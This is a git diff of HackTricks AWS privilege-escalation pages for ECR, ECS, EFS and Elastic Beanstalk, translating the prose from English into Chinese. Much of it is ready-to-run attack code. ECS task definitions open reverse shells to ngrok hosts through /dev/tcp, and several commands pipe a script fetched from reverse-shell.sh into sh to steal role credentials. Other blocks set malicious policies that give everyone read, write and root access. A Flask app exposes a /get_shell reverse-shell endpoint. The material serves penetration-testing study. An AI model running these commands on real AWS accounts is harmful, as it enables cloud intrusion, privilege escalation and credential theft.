ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` -Like the previous section, but for public repositories. +与前一部分相似,但适用于公共存储库。 ### `ecr:SetRepositoryPolicy` -An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ -For example, in this example read access is given to everyone. - +拥有此权限的攻击者可以 **更改** **存储库** **策略** 以授予自己(甚至所有人) **读/写访问**。\ +例如,在这个例子中,读访问权限被授予给所有人。 ```bash aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json +--repository-name \ +--policy-text file://my-policy.json ``` - -Contents of `my-policy.json`: - +`my-policy.json` 的内容: ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "allow public pull", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "allow public pull", +"Effect": "Allow", +"Principal": "*", +"Action": [ +"ecr:BatchCheckLayerAvailability", +"ecr:BatchGetImage", +"ecr:GetDownloadUrlForLayer" +] +} +] } ``` - ### `ecr-public:SetRepositoryPolicy` -Like the previoous section, but for public repositories.\ -An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. 
-
+与前一部分类似,但适用于公共存储库。\
+攻击者可以**修改ECR公共存储库的存储库策略**以授予未经授权的公共访问或提升他们的权限。
```bash
# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
```
-**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
+**潜在影响**:未经授权的公共访问ECR公共存储库,允许任何用户推送、拉取或删除镜像。

### `ecr:PutRegistryPolicy`

-An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**.
+拥有此权限的攻击者可以**更改** **注册表策略**,以授予自己、他的账户(甚至所有人)**读/写访问**。
```bash
# Note: the registry policy is account-wide, so no repository name is passed
aws ecr put-registry-policy \
--policy-text file://my-policy.json
```
{{#include ../../../banners/hacktricks-training.md}}

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
index 4988270ab..c8bf700f1 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
@@ -4,7 +4,7 @@

## ECS

-More **info about ECS** in:
+更多关于 **ECS** 的信息在:

{{#ref}}
../aws-services/aws-ecs-enum.md
@@ -12,185 +12,173 @@ More **info about ECS** in:

### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`

-An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.
- +攻击者滥用 `iam:PassRole`、`ecs:RegisterTaskDefinition` 和 `ecs:RunTask` 权限可以 **生成一个新的任务定义**,其中包含一个 **恶意容器**,该容器窃取元数据凭证并 **运行它**。 ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --requires-compatibilities "[\"FARGATE\"]" \ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" +--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--requires-compatibilities "[\"FARGATE\"]" \ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" # Run task definition aws ecs run-task --task-definition iam_exfiltration \ - --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \ - --launch-type FARGATE \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}" +--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \ +--launch-type FARGATE \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}" # Delete task definition ## You need to remove all the versions (:1 is enough if you just created one) aws ecs deregister-task-definition --task-definition iam_exfiltration:1 ``` - -**Potential Impact:** Direct privesc to a different ECS role. +**潜在影响:** 直接提升权限到不同的ECS角色。 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask` -Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\ -However, in this case, a container instance to run the malicious task definition need to be. - +就像在前面的例子中,攻击者滥用**`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`**权限在ECS中可以**生成一个新的任务定义**,其中包含一个**恶意容器**,该容器窃取元数据凭证并**运行它**。\ +然而,在这种情况下,需要有一个容器实例来运行恶意任务定义。 ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" +--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" aws ecs start-task --task-definition iam_exfiltration \ - --container-instances +--container-instances # Delete task definition ## You need to remove all the versions (:1 is enough if you just created one) aws ecs deregister-task-definition --task-definition iam_exfiltration:1 ``` - -**Potential Impact:** Direct privesc to any ECS role. 
+**潜在影响:** 直接提升到任何 ECS 角色。 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)` -Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.** - +就像在前面的例子中,攻击者滥用 **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** 或 **`ecs:CreateService`** 权限可以 **生成一个新的任务定义**,其中包含一个 **恶意容器**,该容器窃取元数据凭证并 **通过创建一个至少运行 1 个任务的新服务来运行它。** ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn "$ECS_ROLE_ARN" \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --requires-compatibilities "[\"FARGATE\"]" \ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]" +--task-role-arn "$ECS_ROLE_ARN" \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--requires-compatibilities "[\"FARGATE\"]" \ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]" # Run the task creating a service aws ecs create-service --service-name exfiltration \ - --task-definition iam_exfiltration \ - --desired-count 1 \ - --cluster "$CLUSTER_ARN" \ - --launch-type FARGATE \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}" +--task-definition iam_exfiltration \ +--desired-count 1 \ +--cluster "$CLUSTER_ARN" \ +--launch-type FARGATE \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}" # Run the task updating a service aws ecs update-service --cluster \ - --service \ - --task-definition +--service \ +--task-definition ``` - -**Potential Impact:** Direct privesc to any ECS role. +**潜在影响:** 直接提升到任何 ECS 角色。 ### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)` -Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like: - +实际上,仅凭这些权限,就可以使用覆盖来在具有任意角色的容器中执行任意命令,例如: ```bash aws ecs run-task \ - --task-definition "" \ - --overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \ - --cluster \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" +--task-definition "" \ +--overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \ +--cluster \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" ``` - -**Potential Impact:** Direct privesc to any ECS role. 
+**潜在影响:** 直接提升到任何 ECS 角色。 ### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** -This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\ -This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\ -You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)). +这个场景与之前的类似,但**没有** **`iam:PassRole`** 权限。\ +这仍然很有趣,因为如果你可以运行任意容器,即使没有角色,你也可以**运行特权容器以逃逸**到节点并**窃取 EC2 IAM 角色**和**在节点上运行的其他 ECS 容器角色**。\ +你甚至可以**强制其他任务在你妥协的 EC2 实例内运行**以窃取它们的凭证(如在[**提升到节点部分**](aws-ecs-privesc.md#privesc-to-node)中讨论的)。 > [!WARNING] -> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. - +> 只有当**ECS 集群使用 EC2** 实例而不是 Fargate 时,这种攻击才是可能的。 ```bash printf '[ - { - "name":"exfil_creds", - "image":"python:latest", - "entryPoint":["sh", "-c"], - "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""], - "mountPoints": [ - { - "readOnly": false, - "containerPath": "/var/run/docker.sock", - "sourceVolume": "docker-socket" - } - ] - } +{ +"name":"exfil_creds", +"image":"python:latest", +"entryPoint":["sh", "-c"], +"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""], +"mountPoints": [ +{ +"readOnly": false, +"containerPath": "/var/run/docker.sock", +"sourceVolume": "docker-socket" +} +] +} ]' > /tmp/task.json printf '[ - { - "name": "docker-socket", - "host": { - "sourcePath": "/var/run/docker.sock" - } - } +{ +"name": "docker-socket", +"host": { +"sourcePath": "/var/run/docker.sock" +} +} ]' > /tmp/volumes.json aws ecs register-task-definition --family iam_exfiltration \ - --cpu 256 --memory 512 \ - --requires-compatibilities '["EC2"]' \ - --container-definitions file:///tmp/task.json \ - --volumes file:///tmp/volumes.json +--cpu 256 --memory 512 \ +--requires-compatibilities '["EC2"]' \ +--container-definitions file:///tmp/task.json \ +--volumes file:///tmp/volumes.json aws ecs run-task --task-definition iam_exfiltration \ - --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \ - --launch-type EC2 +--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \ +--launch-type EC2 # You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell ``` - ### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** -An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\ -However, in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't). 
+拥有 **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** 的攻击者可以 **在运行的容器内执行命令** 并提取附加到它的 IAM 角色(您需要描述权限,因为运行 `aws ecs execute-command` 是必要的)。\ +然而,为此,容器实例需要运行 **ExecuteCommand agent**(默认情况下并不是)。 -Therefore, the attacker cloud try to: - -- **Try to run a command** in every running container +因此,攻击者可以尝试: +- **尝试在每个运行的容器中运行命令** ```bash # List enableExecuteCommand on each task for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do - echo "Cluster $cluster" - for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do - echo " Task $task" - # If true, it's your lucky day - aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand - done +echo "Cluster $cluster" +for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do +echo " Task $task" +# If true, it's your lucky day +aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand +done done # Execute a shell in a container aws ecs execute-command --interactive \ - --command "sh" \ - --cluster "$CLUSTER_ARN" \ - --task "$TASK_ARN" +--command "sh" \ +--cluster "$CLUSTER_ARN" \ +--task "$TASK_ARN" ``` +- 如果他有 **`ecs:RunTask`**,可以使用 `aws ecs run-task --enable-execute-command [...]` 运行一个任务 +- 如果他有 **`ecs:StartTask`**,可以使用 `aws ecs start-task --enable-execute-command [...]` 运行一个任务 +- 如果他有 **`ecs:CreateService`**,可以使用 `aws ecs create-service --enable-execute-command [...]` 创建一个服务 +- 如果他有 **`ecs:UpdateService`**,可以使用 `aws ecs update-service --enable-execute-command [...]` 更新一个服务 -- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` -- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` -- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` -- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` +您可以在 **之前的 ECS privesc 部分** 找到 **这些选项的示例**。 -You can find **examples of those options** in **previous ECS privesc sections**. - -**Potential Impact:** Privesc to a different role attached to containers. +**潜在影响:** 提升到附加在容器上的不同角色。 ### `ssm:StartSession` -Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**: +请查看 **ssm privesc 页面**,了解如何利用此权限 **提升到 ECS**: {{#ref}} aws-ssm-privesc.md @@ -198,7 +186,7 @@ aws-ssm-privesc.md ### `iam:PassRole`, `ec2:RunInstances` -Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**: +请查看 **ec2 privesc 页面**,了解如何利用这些权限 **提升到 ECS**: {{#ref}} aws-ec2-privesc.md @@ -206,30 +194,29 @@ aws-ec2-privesc.md ### `?ecs:RegisterContainerInstance` -TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker?? +TODO: 是否可以从不同的 AWS 账户注册一个实例,以便任务在攻击者控制的机器上运行? ### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets` > [!NOTE] -> TODO: Test this - -An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**. 
+> TODO: 测试这个 +拥有权限 `ecs:CreateTaskSet`、`ecs:UpdateServicePrimaryTaskSet` 和 `ecs:DescribeTaskSets` 的攻击者可以 **为现有的 ECS 服务创建一个恶意任务集并更新主任务集**。这允许攻击者 **在服务内执行任意代码**。 ```bash bashCopy code# Register a task definition with a reverse shell echo '{ - "family": "malicious-task", - "containerDefinitions": [ - { - "name": "malicious-container", - "image": "alpine", - "command": [ - "sh", - "-c", - "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh" - ] - } - ] +"family": "malicious-task", +"containerDefinitions": [ +{ +"name": "malicious-container", +"image": "alpine", +"command": [ +"sh", +"-c", +"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh" +] +} +] }' > malicious-task-definition.json aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json @@ -240,15 +227,10 @@ aws ecs create-task-set --cluster existing-cluster --service existing-service -- # Update the primary task set for the service aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id ``` +**潜在影响**:在受影响的服务中执行任意代码,可能影响其功能或泄露敏感数据。 -**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data. - -## References +## 参考文献 - [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md index 8a54b28d8..3e63c396c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md @@ -4,97 +4,83 @@ ## EFS -More **info about EFS** in: +更多关于 EFS 的信息在: {{#ref}} ../aws-services/aws-efs-enum.md {{#endref}} -Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it. +请记住,为了挂载 EFS,您需要在 EFS 被暴露的子网络中并且拥有访问权限(安全组)。如果发生这种情况,默认情况下,您将始终能够挂载它,但是,如果它受到 IAM 策略的保护,您需要拥有此处提到的额外权限才能访问它。 ### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy` -With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted. 
- -To delete the policy: +拥有任何这些权限,攻击者可以 **更改文件系统策略** 以 **授予您访问权限**,或者仅仅 **删除它** 以便 **授予默认访问**。 +要删除策略: ```bash aws efs delete-file-system-policy \ - --file-system-id +--file-system-id ``` - -To change it: - +要更改它: ```json aws efs put-file-system-policy --file-system-id --policy file:///tmp/policy.json // Give everyone trying to mount it read, write and root access // policy.json: { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", - "Statement": [ - { - "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "elasticfilesystem:ClientRootAccess", - "elasticfilesystem:ClientWrite", - "elasticfilesystem:ClientMount" - ], - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", +"Statement": [ +{ +"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"elasticfilesystem:ClientRootAccess", +"elasticfilesystem:ClientWrite", +"elasticfilesystem:ClientMount" +], +"Condition": { +"Bool": { +"elasticfilesystem:AccessedViaMountTarget": "true" +} +} +} +] } ``` - ### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)` -With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**. - +拥有此权限的攻击者将能够**挂载 EFS**。如果默认情况下没有给予所有可以挂载 EFS 的人写权限,他将只有**读取访问权限**。 ```bash sudo mkdir /efs sudo mount -t efs -o tls,iam :/ /efs/ ``` +额外的权限`elasticfilesystem:ClientRootAccess`和`elasticfilesystem:ClientWrite`可以在文件系统挂载后用于**写入**文件系统内部,并以**root**身份**访问**该文件系统。 -The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**. - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**潜在影响:** 通过在文件系统中定位敏感信息进行间接权限提升。 ### `elasticfilesystem:CreateMountTarget` -If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege: - +如果攻击者在**子网络**中,且**没有挂载目标**的EFS,他可以利用此权限**在他的子网络中创建一个**: ```bash # You need to indicate security groups that will grant the user access to port 2049 aws efs create-mount-target --file-system-id \ - --subnet-id \ - --security-groups +--subnet-id \ +--security-groups ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**潜在影响:** 通过在文件系统中定位敏感信息进行间接权限提升。 ### `elasticfilesystem:ModifyMountTargetSecurityGroups` -In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**: - +在攻击者发现EFS在他的子网络中有挂载目标但**没有安全组允许流量**的情况下,他可以**通过修改所选安全组来改变这一点**: ```bash aws efs modify-mount-target-security-groups \ - --mount-target-id \ - --security-groups +--mount-target-id \ +--security-groups ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. 
+**潜在影响:** 通过在文件系统中定位敏感信息进行间接权限提升。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md index 613dd3a47..96b633c3c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md @@ -4,19 +4,18 @@ ## Elastic Beanstalk -More **info about Elastic Beanstalk** in: +更多关于 **Elastic Beanstalk** 的信息在: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md {{#endref}} > [!WARNING] -> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** +> 为了在 Beanstalk 中执行敏感操作,您需要在许多不同的服务中拥有 **大量敏感权限**。您可以检查例如授予 **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** 的权限。 -### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others - -With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it. +### `elasticbeanstalk:RebuildEnvironment`、S3 写权限及其他 +拥有 **对包含环境代码的 S3 存储桶的写权限** 和 **重建** 应用程序的权限(需要 `elasticbeanstalk:RebuildEnvironment` 以及与 `S3`、`EC2` 和 `Cloudformation` 相关的其他权限),您可以 **修改** **代码**、**重建** 应用程序,下次访问应用程序时,它将 **执行您的新代码**,使攻击者能够危害应用程序及其 IAM 角色凭证。 ```bash # Create folder mkdir elasticbeanstalk-eu-west-1-947247140022 @@ -31,56 +30,42 @@ aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247 # Rebuild env aws elasticbeanstalk rebuild-environment --environment-name "env-name" ``` +### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`,以及更多... -### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... - -The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. 
- -- Create an AWS Elastic Beanstalk application: +提到的权限加上几个 **`S3`**,**`EC2`**,**`cloudformation`**,**`autoscaling`** 和 **`elasticloadbalancing`** 权限是从头创建一个原始的 Elastic Beanstalk 场景所必需的。 +- 创建一个 AWS Elastic Beanstalk 应用程序: ```bash aws elasticbeanstalk create-application --application-name MyApp ``` - -- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): - +- 创建一个 AWS Elastic Beanstalk 环境 ([**支持的平台**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): ```bash aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role ``` +如果环境已经创建,并且你**不想创建一个新的环境**,你可以直接**更新**现有的环境。 -If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one. - -- Package your application code and dependencies into a ZIP file: - +- 将你的应用程序代码和依赖项打包成一个ZIP文件: ```python zip -r MyApp.zip . ``` - -- Upload the ZIP file to an S3 bucket: - +- 将ZIP文件上传到S3桶: ```python aws s3 cp MyApp.zip s3://elasticbeanstalk--/MyApp.zip ``` - -- Create an AWS Elastic Beanstalk application version: - +- 创建一个 AWS Elastic Beanstalk 应用程序版本: ```css aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="MyApp.zip" ``` - -- Deploy the application version to your AWS Elastic Beanstalk environment: - +- 将应用程序版本部署到您的 AWS Elastic Beanstalk 环境: ```bash aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 ``` - ### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses` -First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. 
Potentially a simple **zip** containing these **2 files**: +首先,您需要创建一个**合法的 Beanstalk 环境**,其中包含您希望在**受害者**上运行的**代码**,按照**之前的步骤**进行操作。可能是一个简单的**zip**文件,包含这**2个文件**: {{#tabs }} {{#tab name="application.py" }} - ```python from flask import Flask, request, jsonify import subprocess,os, socket @@ -89,34 +74,32 @@ application = Flask(__name__) @application.errorhandler(404) def page_not_found(e): - return jsonify('404') +return jsonify('404') @application.route("/") def index(): - return jsonify('Welcome!') +return jsonify('Welcome!') @application.route("/get_shell") def search(): - host=request.args.get('host') - port=request.args.get('port') - if host and port: - s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) - s.connect((host,int(port))) - os.dup2(s.fileno(),0) - os.dup2(s.fileno(),1) - os.dup2(s.fileno(),2) - p=subprocess.call(["/bin/sh","-i"]) - return jsonify('done') +host=request.args.get('host') +port=request.args.get('port') +if host and port: +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect((host,int(port))) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(["/bin/sh","-i"]) +return jsonify('done') if __name__=="__main__": - application.run() +application.run() ``` - {{#endtab }} {{#tab name="requirements.txt" }} - ``` click==7.1.2 Flask==1.1.2 @@ -125,44 +108,42 @@ Jinja2==2.11.3 MarkupSafe==1.1.1 Werkzeug==1.0.1 ``` - {{#endtab }} {{#endtabs }} -Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the 